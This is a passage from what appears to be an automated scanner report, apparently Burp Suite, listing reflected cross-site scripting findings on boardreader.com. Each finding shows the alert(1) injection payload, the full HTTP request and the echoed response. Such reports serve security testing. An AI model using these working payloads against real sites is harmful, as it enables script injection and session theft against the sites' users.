Expires: Thu, 03 Feb 2011 01:19:54 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=2mdn.net%2Fx22&b358d'-alert(1)-'f4b7b9879fc=1&p=30&d=1288898394&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.84. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/aol.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94a63'-alert(1)-'782a59af270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/aol.com?94a63'-alert(1)-'782a59af270=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:02:03 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:02:10 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=aol.com&94a63'-alert(1)-'782a59af270=1&p=30&d=1288940530&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.85. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/aol.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e75"><script>alert(1)</script>f6043616387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/aol.com?f0e75"><script>alert(1)</script>f6043616387=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:01:40 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:01:45 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/aol.com?f0e75"><script>alert(1)</script>f6043616387=1">
...[SNIP]...

4.86. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/cafemom.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3d7'-alert(1)-'2f4ee664641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/cafemom.com?3c3d7'-alert(1)-'2f4ee664641=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:47 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=cafemom.com&3c3d7'-alert(1)-'2f4ee664641=1&p=30&d=1288939967&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.87. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/cafemom.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3ee"><script>alert(1)</script>40468857845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:05 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:18 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1">
...[SNIP]...

4.88. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/myegy.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1683'-alert(1)-'aae0d7e564f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/myegy.com?c1683'-alert(1)-'aae0d7e564f=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:55 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:59:00 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=myegy.com&c1683'-alert(1)-'aae0d7e564f=1&p=30&d=1288940340&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.89. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/myegy.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f3c"><script>alert(1)</script>bb270b2c8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:29 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:58:37 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1">
...[SNIP]...

4.90. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/nolanfans.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7be"><script>alert(1)</script>8eb8f9da978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:53 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:09 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1">
...[SNIP]...

4.91. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/nolanfans.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9419e'-alert(1)-'6dbeba69c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/nolanfans.com?9419e'-alert(1)-'6dbeba69c1=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:22 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:24 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=nolanfans.com&9419e'-alert(1)-'6dbeba69c1=1&p=30&d=1288940004&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.92. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/ratedesi.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe4a"><script>alert(1)</script>5a4d6909fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:30 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1">
...[SNIP]...

4.93. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path: